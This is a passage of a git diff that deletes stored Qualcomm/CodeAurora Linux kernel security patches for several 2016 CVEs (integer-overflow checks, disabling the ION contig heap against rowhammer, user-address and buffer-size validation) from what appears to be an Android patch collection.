-as ULONG_MAX has typeof 'unsigned long', while req->assoclen,
-req->crytlen, and qreq.ivsize are 'unsigned int'. Make change
-to use UINT_MAX instead of ULONG_MAX.
-
-CRs-fixed: 1050970
-Change-Id: I3782ea7ed2eaacdcad15b34e047a4699bf4f9e4f
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/crypto/msm/qcrypto.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/crypto/msm/qcrypto.c b/drivers/crypto/msm/qcrypto.c
-index a975575..79e5ae9 100644
---- a/drivers/crypto/msm/qcrypto.c
-+++ b/drivers/crypto/msm/qcrypto.c
-@@ -2168,12 +2168,12 @@ static int _qcrypto_process_aead(struct  crypto_engine *pengine,
- 			 * include  assoicated data, ciphering data stream,
- 			 * generated MAC, and CCM padding.
- 			 */
--			if ((MAX_ALIGN_SIZE * 2 > ULONG_MAX - req->assoclen) ||
-+			if ((MAX_ALIGN_SIZE * 2 > UINT_MAX - req->assoclen) ||
- 				((MAX_ALIGN_SIZE * 2 + req->assoclen) >
--						ULONG_MAX - qreq.ivsize) ||
-+						UINT_MAX - qreq.ivsize) ||
- 				((MAX_ALIGN_SIZE * 2 + req->assoclen
- 					+ qreq.ivsize)
--						> ULONG_MAX - req->cryptlen)) {
-+						> UINT_MAX - req->cryptlen)) {
- 				pr_err("Integer overflow on aead req length.\n");
- 				return -EINVAL;
- 			}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6728/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6728/ANY/0001.patch
deleted file mode 100644
index 1b899dd2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6728/ANY/0001.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From 37b3cefe6c01bed2e048d7a42b1c4021f4ba279d Mon Sep 17 00:00:00 2001
-From: Liam Mark <lmark@codeaurora.org>
-Date: Wed, 12 Oct 2016 14:22:56 -0700
-Subject: ion: disable system contig heap
-
-A malicious application can take advantage of the ION contig heap to
-create a specific memory chunk size to exercise a rowhammer attack on the
-physical hardware.
-So remove support for the ION contig heap.
-
-Change-Id: I9cb454cebb74df291479cecc3533d2c684363f77
-Signed-off-by: Liam Mark <lmark@codeaurora.org>
-Signed-off-by: Prakash Gupta <guptap@codeaurora.org>
-Signed-off-by: Meghana Ashok <meghanaa@codeaurora.org>
----
- drivers/gpu/ion/ion_heap.c | 8 +++++---
- 1 file changed, 5 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/gpu/ion/ion_heap.c b/drivers/gpu/ion/ion_heap.c
-index 98c1a8c..061e22a 100644
---- a/drivers/gpu/ion/ion_heap.c
-+++ b/drivers/gpu/ion/ion_heap.c
-@@ -26,8 +26,9 @@ struct ion_heap *ion_heap_create(struct ion_platform_heap *heap_data)
- 
- 	switch ((int) heap_data->type) {
- 	case ION_HEAP_TYPE_SYSTEM_CONTIG:
--		heap = ion_system_contig_heap_create(heap_data);
--		break;
-+		pr_err("%s: Heap type is disabled: %d\n", __func__,
-+		heap_data->type);
-+		return ERR_PTR(-EINVAL);
- 	case ION_HEAP_TYPE_SYSTEM:
- 		heap = ion_system_heap_create(heap_data);
- 		break;
-@@ -71,7 +72,8 @@ void ion_heap_destroy(struct ion_heap *heap)
- 
- 	switch ((int) heap->type) {
- 	case ION_HEAP_TYPE_SYSTEM_CONTIG:
--		ion_system_contig_heap_destroy(heap);
-+		pr_err("%s: Heap type is disabled: %d\n", __func__,
-+			heap->type);
- 		break;
- 	case ION_HEAP_TYPE_SYSTEM:
- 		ion_system_heap_destroy(heap);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6728/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-6728/ANY/0002.patch
deleted file mode 100644
index 3ded682e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6728/ANY/0002.patch
+++ /dev/null
@@ -1,326 +0,0 @@
-From a3fe90fbd3500e7ecaa32b9da5e582d78cb5cef9 Mon Sep 17 00:00:00 2001
-From: Liam Mark <lmark@codeaurora.org>
-Date: Wed, 12 Oct 2016 14:22:56 -0700
-Subject: ion: disable system contig heap
-
-A malicious application can take advantage of the ION contig heap to
-create a specific memory chunk size to exercise a rowhammer attack on the
-physical hardware.
-So remove support for the ION contig heap.
-
-Change-Id: I9cb454cebb74df291479cecc3533d2c684363f77
-Signed-off-by: Liam Mark <lmark@codeaurora.org>
-Signed-off-by: Prakash Gupta <guptap@codeaurora.org>
-Signed-off-by: Paresh Purabhiya <ppurab@codeaurora.org>
----
- arch/arm/boot/dts/qcom/apq8084-ion.dtsi       |  7 +------
- arch/arm/boot/dts/qcom/msm8226-ion.dtsi       |  7 +------
- arch/arm/boot/dts/qcom/msm8226-w-ion.dtsi     |  7 +------
- arch/arm/boot/dts/qcom/msm8610-ion.dtsi       |  7 +------
- arch/arm/boot/dts/qcom/msm8909-ion.dtsi       |  5 -----
- arch/arm/boot/dts/qcom/msm8916-512mb-ion.dtsi |  7 +------
- arch/arm/boot/dts/qcom/msm8916-ion.dtsi       |  7 +------
- arch/arm/boot/dts/qcom/msm8939-ion.dtsi       |  7 +------
- arch/arm/boot/dts/qcom/msm8974-ion.dtsi       |  7 +------
- arch/arm/boot/dts/qcom/msm8992-ion.dtsi       |  7 +------
- arch/arm/boot/dts/qcom/msm8994-ion.dtsi       |  7 +------
- arch/arm/boot/dts/qcom/msmtellurium-ion.dtsi  |  7 +------
- drivers/staging/android/ion/ion_heap.c        | 10 ++++++----
- 13 files changed, 17 insertions(+), 75 deletions(-)
-
-diff --git a/arch/arm/boot/dts/qcom/apq8084-ion.dtsi b/arch/arm/boot/dts/qcom/apq8084-ion.dtsi
-index bd649fe..436a966 100644
---- a/arch/arm/boot/dts/qcom/apq8084-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/apq8084-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2014,2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- 			qcom,ion-heap-type = "SYSTEM";
- 		};
- 
--		qcom,ion-heap@21 {
--			reg = <21>;
--			qcom,ion-heap-type = "SYSTEM_CONTIG";
--		};
--
- 		qcom,ion-heap@8 { /* CP_MM HEAP */
- 			compatible = "qcom,msm-ion-reserve";
- 			reg = <8>;
-diff --git a/arch/arm/boot/dts/qcom/msm8226-ion.dtsi b/arch/arm/boot/dts/qcom/msm8226-ion.dtsi
-index b3c25a3..949f506 100644
---- a/arch/arm/boot/dts/qcom/msm8226-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8226-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2014,2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- 			qcom,ion-heap-type = "SYSTEM";
- 		};
- 
--		system_contig_heap: qcom,ion-heap@21 {
--			reg = <21>;
--			qcom,ion-heap-type = "SYSTEM_CONTIG";
--		};
--
- 		cp_mm_heap: qcom,ion-heap@8 { /* CP_MM HEAP */
- 			compatible = "qcom,msm-ion-reserve";
- 			reg = <8>;
-diff --git a/arch/arm/boot/dts/qcom/msm8226-w-ion.dtsi b/arch/arm/boot/dts/qcom/msm8226-w-ion.dtsi
-index 1ac36e0..e638bc5 100644
---- a/arch/arm/boot/dts/qcom/msm8226-w-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8226-w-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014,2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- 			qcom,ion-heap-type = "SYSTEM";
- 		};
- 
--		system_contig_heap: qcom,ion-heap@21 {
--			reg = <21>;
--			qcom,ion-heap-type = "SYSTEM_CONTIG";
--		};
--
- 		qsecom_heap: qcom,ion-heap@27 { /* QSECOM HEAP */
- 			compatible = "qcom,msm-ion-reserve";
- 			reg = <27>;
-diff --git a/arch/arm/boot/dts/qcom/msm8610-ion.dtsi b/arch/arm/boot/dts/qcom/msm8610-ion.dtsi
-index a7a428b..22ba8c1 100644
---- a/arch/arm/boot/dts/qcom/msm8610-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8610-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2014,2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- 			qcom,ion-heap-type = "SYSTEM";
- 		};
- 
--		qcom,ion-heap@21 {
--			reg = <21>;
--			qcom,ion-heap-type = "SYSTEM_CONTIG";
--		};
--
- 		qcom,ion-heap@27 { /* QSECOM HEAP */
- 			compatible = "qcom,msm-ion-reserve";
- 			reg = <27>;
-diff --git a/arch/arm/boot/dts/qcom/msm8909-ion.dtsi b/arch/arm/boot/dts/qcom/msm8909-ion.dtsi
-index 509e361..7ec0690 100644
---- a/arch/arm/boot/dts/qcom/msm8909-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8909-ion.dtsi
-@@ -21,11 +21,6 @@
- 			qcom,ion-heap-type = "SYSTEM";
- 		};
- 
--		system_contig_heap: qcom,ion-heap@21 {
--			reg = <21>;
--			qcom,ion-heap-type = "SYSTEM_CONTIG";
--		};
--
- 		qsecom_heap: qcom,ion-heap@27 { /* QSEECOM HEAP */
- 			compatible = "qcom,msm-ion-reserve";
- 			reg = <27>;
-diff --git a/arch/arm/boot/dts/qcom/msm8916-512mb-ion.dtsi b/arch/arm/boot/dts/qcom/msm8916-512mb-ion.dtsi
-index b688a10..2cebe62 100644
---- a/arch/arm/boot/dts/qcom/msm8916-512mb-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8916-512mb-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014, Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014,2016, Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- 			qcom,ion-heap-type = "SYSTEM";
- 		};
- 
--		qcom,ion-heap@21 {
--			reg = <21>;
--			qcom,ion-heap-type = "SYSTEM_CONTIG";
--		};
--
- 		qcom,ion-heap@27 { /* QSEECOM HEAP */
- 			compatible = "qcom,msm-ion-reserve";
- 			reg = <27>;
-diff --git a/arch/arm/boot/dts/qcom/msm8916-ion.dtsi b/arch/arm/boot/dts/qcom/msm8916-ion.dtsi
-index 80baf241..53e85b9 100644
---- a/arch/arm/boot/dts/qcom/msm8916-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8916-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014, Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014,2016, Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- 			qcom,ion-heap-type = "SYSTEM";
- 		};
- 
--		qcom,ion-heap@21 {
--			reg = <21>;
--			qcom,ion-heap-type = "SYSTEM_CONTIG";
--		};
--
- 		qcom,ion-heap@8 { /* CP_MM HEAP */
- 			compatible = "qcom,msm-ion-reserve";
- 			reg = <8>;
-diff --git a/arch/arm/boot/dts/qcom/msm8939-ion.dtsi b/arch/arm/boot/dts/qcom/msm8939-ion.dtsi
-index f5e7054..39e3fa5 100644
---- a/arch/arm/boot/dts/qcom/msm8939-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8939-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014, Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014,2016, Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- 			qcom,ion-heap-type = "SYSTEM";
- 		};
- 
--		qcom,ion-heap@21 {
--			reg = <21>;
--			qcom,ion-heap-type = "SYSTEM_CONTIG";
--		};
--
- 		qcom,ion-heap@8 { /* CP_MM HEAP */
- 			compatible = "qcom,msm-ion-reserve";
- 			reg = <8>;
-diff --git a/arch/arm/boot/dts/qcom/msm8974-ion.dtsi b/arch/arm/boot/dts/qcom/msm8974-ion.dtsi
-index de751a0..e9ead3c 100644
---- a/arch/arm/boot/dts/qcom/msm8974-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8974-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2014,2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- 			qcom,ion-heap-type = "SYSTEM";
- 		};
- 
--		qcom,ion-heap@21 {
--			reg = <21>;
--			qcom,ion-heap-type = "SYSTEM_CONTIG";
--		};
--
- 		qcom,ion-heap@8 { /* CP_MM HEAP */
- 			compatible = "qcom,msm-ion-reserve";
- 			reg = <8>;
-diff --git a/arch/arm/boot/dts/qcom/msm8992-ion.dtsi b/arch/arm/boot/dts/qcom/msm8992-ion.dtsi
-index b359777..ec9bdab 100644
---- a/arch/arm/boot/dts/qcom/msm8992-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8992-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014,2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- 			qcom,ion-heap-type = "SYSTEM";
- 		};
- 
--		qcom,ion-heap@21 {
--			reg = <21>;
--			qcom,ion-heap-type = "SYSTEM_CONTIG";
--		};
--
- 		qcom,ion-heap@22 { /* adsp heap */
- 			reg = <22>;
- 			linux,contiguous-region = <&adsp_mem>;
-diff --git a/arch/arm/boot/dts/qcom/msm8994-ion.dtsi b/arch/arm/boot/dts/qcom/msm8994-ion.dtsi
-index 16b920e..deea46f 100644
---- a/arch/arm/boot/dts/qcom/msm8994-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8994-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014,2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- 			qcom,ion-heap-type = "SYSTEM";
- 		};
- 
--		qcom,ion-heap@21 {
--			reg = <21>;
--			qcom,ion-heap-type = "SYSTEM_CONTIG";
--		};
--
- 		qcom,ion-heap@8 { /* CP_MM HEAP */
- 			compatible = "qcom,msm-ion-reserve";
- 			reg = <8>;
-diff --git a/arch/arm/boot/dts/qcom/msmtellurium-ion.dtsi b/arch/arm/boot/dts/qcom/msmtellurium-ion.dtsi
-index 79fc0e4..3e8058e 100644
---- a/arch/arm/boot/dts/qcom/msmtellurium-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msmtellurium-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014, Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014,2016, Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- 			qcom,ion-heap-type = "SYSTEM";
- 		};
- 
--		qcom,ion-heap@21 {
--			reg = <21>;
--			qcom,ion-heap-type = "SYSTEM_CONTIG";
--		};
--
- 		qcom,ion-heap@8 { /* CP_MM HEAP */
- 			compatible = "qcom,msm-ion-reserve";
- 			reg = <8>;
-diff --git a/drivers/staging/android/ion/ion_heap.c b/drivers/staging/android/ion/ion_heap.c
-index 583774e..3026fbe 100644
---- a/drivers/staging/android/ion/ion_heap.c
-+++ b/drivers/staging/android/ion/ion_heap.c
-@@ -2,7 +2,7 @@
-  * drivers/gpu/ion/ion_heap.c
-  *
-  * Copyright (C) 2011 Google, Inc.
-- * Copyright (c) 2011-2014, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -302,8 +302,9 @@ struct ion_heap *ion_heap_create(struct ion_platform_heap *heap_data)
- 
- 	switch (heap_data->type) {
- 	case ION_HEAP_TYPE_SYSTEM_CONTIG:
--		heap = ion_system_contig_heap_create(heap_data);
--		break;
-+		pr_err("%s: Heap type is disabled: %d\n", __func__,
-+		       heap_data->type);
-+		return ERR_PTR(-EINVAL);
- 	case ION_HEAP_TYPE_SYSTEM:
- 		heap = ion_system_heap_create(heap_data);
- 		break;
-@@ -342,7 +343,8 @@ void ion_heap_destroy(struct ion_heap *heap)
- 
- 	switch (heap->type) {
- 	case ION_HEAP_TYPE_SYSTEM_CONTIG:
--		ion_system_contig_heap_destroy(heap);
-+		pr_err("%s: Heap type is disabled: %d\n", __func__,
-+		       heap->type);
- 		break;
- 	case ION_HEAP_TYPE_SYSTEM:
- 		ion_system_heap_destroy(heap);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6738/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6738/ANY/0001.patch
deleted file mode 100644
index a2b9d824..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6738/ANY/0001.patch
+++ /dev/null
@@ -1,104 +0,0 @@
-From a829c54236b455885c3e9c7c77ac528b62045e79 Mon Sep 17 00:00:00 2001
-From: AnilKumar Chimata <anilc@codeaurora.org>
-Date: Wed, 31 Aug 2016 14:08:16 +0530
-Subject: qcedev: Validate Source and Destination addresses
-
-Source and Destination addresses passed by user space apps/clients
-are validated independent of type of operation to mitigate kernel
-address space exploitation.
-
-Change-Id: I9ecb0103d7a73eedb2e0d1db1d5613b18dd77e59
-Signed-off-by: AnilKumar Chimata <anilc@codeaurora.org>
----
- drivers/crypto/msm/qcedev.c | 68 ++++++++++++++++++++-------------------------
- 1 file changed, 30 insertions(+), 38 deletions(-)
-
-diff --git a/drivers/crypto/msm/qcedev.c b/drivers/crypto/msm/qcedev.c
-index e63f061..1402d3d 100644
---- a/drivers/crypto/msm/qcedev.c
-+++ b/drivers/crypto/msm/qcedev.c
-@@ -1234,44 +1234,6 @@ static int qcedev_vbuf_ablk_cipher(struct qcedev_async_req *areq,
- 	struct qcedev_cipher_op_req *saved_req;
- 	struct	qcedev_cipher_op_req *creq = &areq->cipher_op_req;
- 
--	/* Verify Source Address's */
--	for (i = 0; i < areq->cipher_op_req.entries; i++)
--		if (!access_ok(VERIFY_READ,
--			(void __user *)areq->cipher_op_req.vbuf.src[i].vaddr,
--					areq->cipher_op_req.vbuf.src[i].len))
--			return -EFAULT;
--
--	/* Verify Destination Address's */
--	if (creq->in_place_op != 1) {
--		for (i = 0, total = 0; i < QCEDEV_MAX_BUFFERS; i++) {
--			if ((areq->cipher_op_req.vbuf.dst[i].vaddr != 0) &&
--						(total < creq->data_len)) {
--				if (!access_ok(VERIFY_WRITE,
--					(void __user *)creq->vbuf.dst[i].vaddr,
--						creq->vbuf.dst[i].len)) {
--					pr_err("%s:DST WR_VERIFY err %d=0x%lx\n",
--						__func__, i, (uintptr_t)
--						creq->vbuf.dst[i].vaddr);
--					return -EFAULT;
--				}
--				total += creq->vbuf.dst[i].len;
--			}
--		}
--	} else  {
--		for (i = 0, total = 0; i < creq->entries; i++) {
--			if (total < creq->data_len) {
--				if (!access_ok(VERIFY_WRITE,
--					(void __user *)creq->vbuf.src[i].vaddr,
--						creq->vbuf.src[i].len)) {
--					pr_err("%s:SRC WR_VERIFY err %d=0x%lx\n",
--						__func__, i, (uintptr_t)
--						creq->vbuf.src[i].vaddr);
--					return -EFAULT;
--				}
--				total += creq->vbuf.src[i].len;
--			}
--		}
--	}
- 	total = 0;
- 
- 	if (areq->cipher_op_req.mode == QCEDEV_AES_MODE_CTR)
-@@ -1569,6 +1531,36 @@ static int qcedev_check_cipher_params(struct qcedev_cipher_op_req *req,
- 			__func__, total, req->data_len);
- 		goto error;
- 	}
-+	/* Verify Source Address's */
-+	for (i = 0, total = 0; i < req->entries; i++) {
-+		if (total < req->data_len) {
-+			if (!access_ok(VERIFY_READ,
-+				(void __user *)req->vbuf.src[i].vaddr,
-+					req->vbuf.src[i].len)) {
-+					pr_err("%s:SRC RD_VERIFY err %d=0x%lx\n",
-+						__func__, i, (uintptr_t)
-+							req->vbuf.src[i].vaddr);
-+					goto error;
-+			}
-+			total += req->vbuf.src[i].len;
-+		}
-+	}
-+
-+	/* Verify Destination Address's */
-+	for (i = 0, total = 0; i < QCEDEV_MAX_BUFFERS; i++) {
-+		if ((req->vbuf.dst[i].vaddr != 0) &&
-+			(total < req->data_len)) {
-+			if (!access_ok(VERIFY_WRITE,
-+				(void __user *)req->vbuf.dst[i].vaddr,
-+					req->vbuf.dst[i].len)) {
-+					pr_err("%s:DST WR_VERIFY err %d=0x%lx\n",
-+						__func__, i, (uintptr_t)
-+							req->vbuf.dst[i].vaddr);
-+					goto error;
-+			}
-+			total += req->vbuf.dst[i].len;
-+		}
-+	}
- 	return 0;
- error:
- 	return -EINVAL;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6739/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-6739/3.10/0001.patch
deleted file mode 100644
index b4759408..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6739/3.10/0001.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From ac8242269094729c464ac042a58603e01427e509 Mon Sep 17 00:00:00 2001
-From: Rajakumar Govindaram <rajakuma@codeaurora.org>
-Date: Thu, 15 Sep 2016 17:09:40 -0700
-Subject: msm: camera: cpp: Validate frame message before manipulating it.
-
-CPP frame message is used to send all frame data
-to Microcontroller. It is sent every frame. CPP kernel
-driver has to add information to it before transfer it.
-The message has to be validated before manipulations.
-If it is not valid the message and corresponding frame
-are discarded.
-
-b/30074605
-CRs-Fixed: 1049826
-
-Change-Id: I3e11ca7f6df4bb0d928512f81f3e3dc40fed791a
-Signed-off-by: Rajakumar Govindaram <rajakuma@codeaurora.org>
----
- .../platform/msm/camera_v2/pproc/cpp/msm_cpp.c     | 26 ++++++++++------------
- 1 file changed, 12 insertions(+), 14 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index 964703c..7874cf6 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2184,21 +2184,19 @@ static int msm_cpp_cfg_frame(struct cpp_device *cpp_dev,
- 		return -EINVAL;
- 	}
- 
--	if (!new_frame->partial_frame_indicator) {
--		if (cpp_frame_msg[new_frame->msg_len - 1] !=
--			MSM_CPP_MSG_ID_TRAILER) {
--			pr_err("Invalid frame message\n");
--			return -EINVAL;
--		}
-+	if (cpp_frame_msg[new_frame->msg_len - 1] !=
-+		MSM_CPP_MSG_ID_TRAILER) {
-+		pr_err("Invalid frame message\n");
-+		return -EINVAL;
-+	}
- 
--		if ((stripe_base + new_frame->num_strips * stripe_size + 1) !=
--			new_frame->msg_len) {
--			pr_err("Invalid frame message,len=%d,expected=%d\n",
--				new_frame->msg_len,
--				(stripe_base +
--				new_frame->num_strips * stripe_size + 1));
--			return -EINVAL;
--		}
-+	if ((stripe_base + new_frame->num_strips * stripe_size + 1) !=
-+		new_frame->msg_len) {
-+		pr_err("Invalid frame message,len=%d,expected=%d\n",
-+			new_frame->msg_len,
-+			(stripe_base +
-+			new_frame->num_strips * stripe_size + 1));
-+		return -EINVAL;
- 	}
- 
- 	if (cpp_dev->iommu_state != CPP_IOMMU_STATE_ATTACHED) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6739/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-6739/3.18/0002.patch
deleted file mode 100644
index 139efbc8..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6739/3.18/0002.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From c4af572a7ad59c0f07fd316a08055bc86dfb5f0d Mon Sep 17 00:00:00 2001
-From: Rajakumar Govindaram <rajakuma@codeaurora.org>
-Date: Thu, 15 Sep 2016 17:09:40 -0700
-Subject: msm: camera: cpp: Validate frame message before manipulating it.
-
-CPP frame message is used to send all frame data
-to Microcontroller. It is sent every frame. CPP kernel
-driver has to add information to it before transfer it.
-The message has to be validated before manipulations.
-If it is not valid the message and corresponding frame
-are discarded.
-
-b/30074605
-CRs-Fixed: 1049826
-
-Change-Id: I3e11ca7f6df4bb0d928512f81f3e3dc40fed791a
-Signed-off-by: Rajakumar Govindaram <rajakuma@codeaurora.org>
----
- .../platform/msm/camera_v2/pproc/cpp/msm_cpp.c     | 26 ++++++++++------------
- 1 file changed, 12 insertions(+), 14 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index c0105a8..18a465f 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2251,21 +2251,19 @@ static int msm_cpp_cfg_frame(struct cpp_device *cpp_dev,
- 		return -EINVAL;
- 	}
- 
--	if (!new_frame->partial_frame_indicator) {
--		if (cpp_frame_msg[new_frame->msg_len - 1] !=
--			MSM_CPP_MSG_ID_TRAILER) {
--			pr_err("Invalid frame message\n");
--			return -EINVAL;
--		}
-+	if (cpp_frame_msg[new_frame->msg_len - 1] !=
-+		MSM_CPP_MSG_ID_TRAILER) {
-+		pr_err("Invalid frame message\n");
-+		return -EINVAL;
-+	}
- 
--		if ((stripe_base + new_frame->num_strips * stripe_size + 1) !=
--			new_frame->msg_len) {
--			pr_err("Invalid frame message,len=%d,expected=%d\n",
--				new_frame->msg_len,
--				(stripe_base +
--				new_frame->num_strips * stripe_size + 1));
--			return -EINVAL;
--		}
-+	if ((stripe_base + new_frame->num_strips * stripe_size + 1) !=
-+		new_frame->msg_len) {
-+		pr_err("Invalid frame message,len=%d,expected=%d\n",
-+			new_frame->msg_len,
-+			(stripe_base +
-+			new_frame->num_strips * stripe_size + 1));
-+		return -EINVAL;
- 	}
- 
- 	if (cpp_dev->iommu_state != CPP_IOMMU_STATE_ATTACHED) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6740/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-6740/3.10/0001.patch
deleted file mode 100644
index 0d9e49a9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6740/3.10/0001.patch
+++ /dev/null
@@ -1,138 +0,0 @@
-From ef78bd62f0c064ae4c827e158d828b2c110ebcdc Mon Sep 17 00:00:00 2001
-From: VijayaKumar T M <vtmuni@codeaurora.org>
-Date: Tue, 6 Sep 2016 12:04:57 +0530
-Subject: msm: sensor: Avoid potential stack overflow
-
-Add a check to validate the user input data is not
-greater than expected stack buffer size to avoid out
-of bounds array accesses
--Fix checkpatch.pl warnings.
-
-CRs-Fixed: 1056307
-Change-Id: I8b31006772367a120828269243b1971d33a4d7d3
-Signed-off-by: VijayaKumar T M <vtmuni@codeaurora.org>
----
- .../platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c   | 13 ++++++++++++-
- .../platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c   | 13 ++++++++++++-
- 2 files changed, 24 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-index 07b7e32..c0ac738 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -361,6 +361,12 @@ int32_t msm_camera_cci_i2c_write_seq_table(
- 	client_addr_type = client->addr_type;
- 	client->addr_type = write_setting->addr_type;
- 
-+	if (reg_setting->reg_data_size > I2C_SEQ_REG_DATA_MAX) {
-+		pr_err("%s: number of bytes %u exceeding the max supported %d\n",
-+		__func__, reg_setting->reg_data_size, I2C_SEQ_REG_DATA_MAX);
-+		return rc;
-+	}
-+
- 	for (i = 0; i < write_setting->size; i++) {
- 		rc = msm_camera_cci_i2c_write_seq(client, reg_setting->reg_addr,
- 			reg_setting->reg_data, reg_setting->reg_data_size);
